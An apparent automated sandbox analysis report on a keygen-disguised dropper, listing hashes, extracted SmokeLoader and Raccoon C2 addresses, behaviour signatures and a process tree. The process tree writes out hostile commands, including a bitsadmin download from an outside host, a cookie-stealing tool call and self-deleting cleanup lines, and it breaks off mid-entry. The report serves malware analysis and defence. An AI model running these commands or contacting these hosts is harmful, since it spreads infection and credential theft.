Resubmissions

08-07-2021 12:18

210708-8z6d5h8z2n 10

06-07-2021 17:53

210706-g6we6sa7sa 10

19-06-2021 18:17

210619-vr8bj2dzfn 10

17-06-2021 21:39

210617-a9cvlnmrbx 10

11-06-2021 17:26

210611-wvab1yw2tj 10

08-06-2021 06:47

210608-qrbpch3y46 10

08-06-2021 06:47

210608-64tndgm1ln 10

05-06-2021 18:40

210605-cd6qpr55sx 10

04-06-2021 11:56

210604-5c416rs3ns 10

04-06-2021 08:52

210604-jy9885jen2 10

Analysis

  • max time kernel
    1803s
  • max time network
    1790s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    04-05-2021 05:53

General

  • Target

    keygen-step-4d.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://999080321newfolder1002002131-service1002.space/

http://999080321newfolder1002002231-service1002.space/

http://999080321newfolder3100231-service1002.space/

http://999080321newfolder1002002431-service1002.space/

http://999080321newfolder1002002531-service1002.space/

http://999080321newfolder33417-012425999080321.space/

http://999080321test125831-service10020125999080321.space/

http://999080321test136831-service10020125999080321.space/

http://999080321test147831-service10020125999080321.space/

http://999080321test146831-service10020125999080321.space/

http://999080321test134831-service10020125999080321.space/

http://999080321est213531-service1002012425999080321.ru/

http://999080321yes1t3481-service10020125999080321.ru/

http://999080321test13561-service10020125999080321.su/

http://999080321test14781-service10020125999080321.info/

http://999080321test13461-service10020125999080321.net/

http://999080321test15671-service10020125999080321.tech/

http://999080321test12671-service10020125999080321.online/

http://999080321utest1341-service10020125999080321.ru/

http://999080321uest71-service100201dom25999080321.ru/

rc4.i32
rc4.i32

Extracted

Family

raccoon

Botnet

afefd33a49c7cbd55d417545269920f24c85aa37

Attributes
  • url4cnc

    https://telete.in/jagressor_kz

rc4.plain
rc4.plain

Signatures

  • Detected facebook phishing page
  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • Windows security bypass 2 TTPs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Blocklisted process makes network request 64 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 61 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 30 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 43 IoCs
  • Modifies data under HKEY_USERS 51 IoCs
  • Modifies registry class 38 IoCs
  • Modifies system certificate store 2 TTPs 15 IoCs
  • NTFS ADS 3 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 10 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 4 IoCs
  • Suspicious behavior: MapViewOfSection 46 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 14 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 18 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:876
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {8685910A-50B1-4858-AFDF-816381A10690} S-1-5-18:NT AUTHORITY\System:Service:
          3⤵
            PID:4012
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 115 -t 8080
              4⤵
              • Executes dropped EXE
              PID:3712
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 114 -t 8080
              4⤵
              • Executes dropped EXE
              PID:2308
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 113 -t 8080
              4⤵
              • Executes dropped EXE
              PID:4320
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 112 -t 8080
              4⤵
              • Executes dropped EXE
              PID:4372
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 111 -t 8080
              4⤵
              • Executes dropped EXE
              PID:5180
            • C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe
              "C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe" -v 110 -t 8080
              4⤵
              • Executes dropped EXE
              PID:6836
            • C:\Windows\system32\rundll32.exe
              C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll",PzbYEKUDEJ
              4⤵
              • Windows security modification
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:7944
          • C:\Windows\system32\taskeng.exe
            taskeng.exe {59DAF749-8DFF-47BB-94C1-DE38A3DFCC6E} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
            3⤵
              PID:7936
              • C:\Users\Admin\AppData\Roaming\ghetbjs
                C:\Users\Admin\AppData\Roaming\ghetbjs
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                PID:8020
                • C:\Users\Admin\AppData\Roaming\ghetbjs
                  C:\Users\Admin\AppData\Roaming\ghetbjs
                  5⤵
                  • Executes dropped EXE
                  • Checks SCSI registry key(s)
                  • Suspicious behavior: MapViewOfSection
                  PID:4004
            • C:\Windows\system32\taskeng.exe
              taskeng.exe {DD53C290-9409-4AD2-9164-071A32BA679D} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
              3⤵
                PID:3780
                • C:\Users\Admin\AppData\Roaming\ghetbjs
                  C:\Users\Admin\AppData\Roaming\ghetbjs
                  4⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  PID:1384
                  • C:\Users\Admin\AppData\Roaming\ghetbjs
                    C:\Users\Admin\AppData\Roaming\ghetbjs
                    5⤵
                    • Executes dropped EXE
                    • Checks SCSI registry key(s)
                    • Suspicious behavior: MapViewOfSection
                    PID:1612
              • C:\Windows\system32\taskeng.exe
                taskeng.exe {C7503F11-5223-4073-9059-8FB12622EB5C} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
                3⤵
                  PID:8148
                  • C:\Users\Admin\AppData\Roaming\ghetbjs
                    C:\Users\Admin\AppData\Roaming\ghetbjs
                    4⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    PID:3308
                    • C:\Users\Admin\AppData\Roaming\ghetbjs
                      C:\Users\Admin\AppData\Roaming\ghetbjs
                      5⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:7768
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:1568
              • C:\Windows\system32\svchost.exe
                C:\Windows\system32\svchost.exe -k SystemNetworkService
                2⤵
                • Drops file in System32 directory
                • Checks processor information in registry
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:1768
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                2⤵
                • Enumerates connected drives
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies registry class
                PID:2848
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding AD4EA4F3C0038C91A34296C47F32C138 C
                  3⤵
                  • Loads dropped DLL
                  PID:2148
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 89C2630FF8AAA1B171E912DFAD05DC99
                  3⤵
                  • Blocklisted process makes network request
                  • Loads dropped DLL
                  PID:2240
                  • C:\Windows\SysWOW64\taskkill.exe
                    "C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f
                    4⤵
                    • Kills process with taskkill
                    PID:2420
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding C75127158EB2A4001B0E3C2EA7CCE117 M Global\MSI0000
                  3⤵
                    PID:3056
              • C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe
                "C:\Users\Admin\AppData\Local\Temp\keygen-step-4d.exe"
                1⤵
                • Loads dropped DLL
                • Checks whether UAC is enabled
                • Suspicious use of WriteProcessMemory
                PID:1020
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  • Suspicious use of WriteProcessMemory
                  PID:1700
                  • C:\Windows\SysWOW64\rundll32.exe
                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                    3⤵
                    • Loads dropped DLL
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of WriteProcessMemory
                    PID:1316
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                  2⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1396
                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                  2⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1512
                  • C:\Users\Admin\AppData\Local\Temp\is-FJ0SF.tmp\Install.tmp
                    "C:\Users\Admin\AppData\Local\Temp\is-FJ0SF.tmp\Install.tmp" /SL5="$3017A,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                    3⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Suspicious use of WriteProcessMemory
                    PID:1616
                    • C:\Users\Admin\AppData\Local\Temp\is-8SHAS.tmp\Ultra.exe
                      "C:\Users\Admin\AppData\Local\Temp\is-8SHAS.tmp\Ultra.exe" /S /UID=burnerch1
                      4⤵
                      • Drops file in Drivers directory
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Modifies system certificate store
                      • Suspicious use of WriteProcessMemory
                      PID:1664
                      • C:\Program Files\Windows Defender\AVNHITOZXG\ultramediaburner.exe
                        "C:\Program Files\Windows Defender\AVNHITOZXG\ultramediaburner.exe" /VERYSILENT
                        5⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Suspicious use of WriteProcessMemory
                        PID:1888
                        • C:\Users\Admin\AppData\Local\Temp\is-886CB.tmp\ultramediaburner.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-886CB.tmp\ultramediaburner.tmp" /SL5="$30188,281924,62464,C:\Program Files\Windows Defender\AVNHITOZXG\ultramediaburner.exe" /VERYSILENT
                          6⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of WriteProcessMemory
                          PID:1944
                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                            7⤵
                            • Executes dropped EXE
                            PID:1116
                      • C:\Users\Admin\AppData\Local\Temp\14-46b2c-974-e2a85-9cd59b4c15b59\Tagipikomo.exe
                        "C:\Users\Admin\AppData\Local\Temp\14-46b2c-974-e2a85-9cd59b4c15b59\Tagipikomo.exe"
                        5⤵
                        • Executes dropped EXE
                        PID:1788
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                          6⤵
                          • Modifies Internet Explorer settings
                          • Suspicious behavior: GetForegroundWindowSpam
                          • Suspicious use of FindShellTrayWindow
                          • Suspicious use of SetWindowsHookEx
                          PID:920
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:920 CREDAT:275457 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:1724
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:920 CREDAT:209930 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • NTFS ADS
                            • Suspicious use of SetWindowsHookEx
                            PID:2244
                          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
                            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:920 CREDAT:537621 /prefetch:2
                            7⤵
                            • Modifies Internet Explorer settings
                            • Suspicious use of SetWindowsHookEx
                            PID:7748
                        • C:\Program Files\Internet Explorer\iexplore.exe
                          "C:\Program Files\Internet Explorer\iexplore.exe" https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                          6⤵
                            PID:2664
                        • C:\Users\Admin\AppData\Local\Temp\e7-6d3bf-a93-97abd-a1e541ddacc00\Nufyqaenyku.exe
                          "C:\Users\Admin\AppData\Local\Temp\e7-6d3bf-a93-97abd-a1e541ddacc00\Nufyqaenyku.exe"
                          5⤵
                          • Executes dropped EXE
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          PID:900
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\z4wnwb1r.law\sskiper.exe /s & exit
                            6⤵
                              PID:1716
                              • C:\Users\Admin\AppData\Local\Temp\z4wnwb1r.law\sskiper.exe
                                C:\Users\Admin\AppData\Local\Temp\z4wnwb1r.law\sskiper.exe /s
                                7⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                PID:2120
                                • C:\Users\Admin\AppData\Local\Temp\639987388.exe
                                  C:\Users\Admin\AppData\Local\Temp\639987388.exe
                                  8⤵
                                  • Executes dropped EXE
                                  PID:3044
                                • C:\Users\Admin\AppData\Local\Temp\1179084950.exe
                                  C:\Users\Admin\AppData\Local\Temp\1179084950.exe
                                  8⤵
                                  • Executes dropped EXE
                                  PID:2396
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\z4wnwb1r.law\sskiper.exe & exit
                                  8⤵
                                    PID:3672
                                    • C:\Windows\SysWOW64\PING.EXE
                                      ping 0
                                      9⤵
                                      • Runs ping.exe
                                      PID:3708
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3dy5djvy.ofx\KiffMainE1.exe & exit
                                6⤵
                                  PID:2816
                                  • C:\Users\Admin\AppData\Local\Temp\3dy5djvy.ofx\KiffMainE1.exe
                                    C:\Users\Admin\AppData\Local\Temp\3dy5djvy.ofx\KiffMainE1.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:2952
                                    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                      dw20.exe -x -s 532
                                      8⤵
                                      • Suspicious behavior: GetForegroundWindowSpam
                                      PID:516
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0uib5gvw.ewr\001.exe & exit
                                  6⤵
                                    PID:3000
                                    • C:\Users\Admin\AppData\Local\Temp\0uib5gvw.ewr\001.exe
                                      C:\Users\Admin\AppData\Local\Temp\0uib5gvw.ewr\001.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                      PID:2092
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\34swvzi3.5sx\installer.exe /qn CAMPAIGN="654" & exit
                                    6⤵
                                      PID:836
                                      • C:\Users\Admin\AppData\Local\Temp\34swvzi3.5sx\installer.exe
                                        C:\Users\Admin\AppData\Local\Temp\34swvzi3.5sx\installer.exe /qn CAMPAIGN="654"
                                        7⤵
                                        • Executes dropped EXE
                                        • Loads dropped DLL
                                        • Enumerates connected drives
                                        • Modifies system certificate store
                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                        • Suspicious use of FindShellTrayWindow
                                        PID:2404
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Yonatan.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\34swvzi3.5sx\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\34swvzi3.5sx\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1619855364 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                          8⤵
                                            PID:1576
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dlq02u4a.qjp\gpooe.exe & exit
                                        6⤵
                                          PID:2568
                                          • C:\Users\Admin\AppData\Local\Temp\dlq02u4a.qjp\gpooe.exe
                                            C:\Users\Admin\AppData\Local\Temp\dlq02u4a.qjp\gpooe.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2192
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2664
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:2440
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:1984
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              8⤵
                                              • Executes dropped EXE
                                              PID:7672
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zuayyk5i.qxg\askinstall39.exe & exit
                                          6⤵
                                            PID:2056
                                            • C:\Users\Admin\AppData\Local\Temp\zuayyk5i.qxg\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\zuayyk5i.qxg\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:1400
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:3840
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:3868
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rki4mv1q.vya\setup.exe & exit
                                              6⤵
                                                PID:2428
                                                • C:\Users\Admin\AppData\Local\Temp\rki4mv1q.vya\setup.exe
                                                  C:\Users\Admin\AppData\Local\Temp\rki4mv1q.vya\setup.exe
                                                  7⤵
                                                    PID:2124
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\rki4mv1q.vya\setup.exe"
                                                      8⤵
                                                        PID:2880
                                                        • C:\Windows\SysWOW64\PING.EXE
                                                          ping 1.1.1.1 -n 1 -w 3000
                                                          9⤵
                                                          • Runs ping.exe
                                                          PID:2108
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\52csbhxc.331\SunLabsPlayer.exe /S & exit
                                                    6⤵
                                                      PID:2304
                                                      • C:\Users\Admin\AppData\Local\Temp\52csbhxc.331\SunLabsPlayer.exe
                                                        C:\Users\Admin\AppData\Local\Temp\52csbhxc.331\SunLabsPlayer.exe /S
                                                        7⤵
                                                        • Executes dropped EXE
                                                        • Drops file in Program Files directory
                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                        PID:2732
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                          8⤵
                                                          • Drops file in Program Files directory
                                                          PID:3376
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:3176
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:3500
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1740
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:3836
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:2824
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                    8⤵
                                                                    • Checks for any installed AV software in registry
                                                                    PID:3080
                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                    "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                    8⤵
                                                                    • Download via BitsAdmin
                                                                    PID:3376
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pziF0KFaFHeETEUi -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    • Drops file in Program Files directory
                                                                    PID:1900
                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pAFQ0AcHzbfsw1Wo -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                    8⤵
                                                                    • Executes dropped EXE
                                                                    PID:3332
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:3472
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:3552
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:2612
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                          8⤵
                                                                          • Drops file in Program Files directory
                                                                          PID:1816
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:2136
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll" PzbYEKUDEJ
                                                                            8⤵
                                                                              PID:3856
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\PzbYEKUDEJ\PzbYEKUDEJ.dll" PzbYEKUDEJ
                                                                                9⤵
                                                                                • Drops file in System32 directory
                                                                                PID:1976
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                              8⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:3696
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:7680
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsyA4BA.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:7780
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
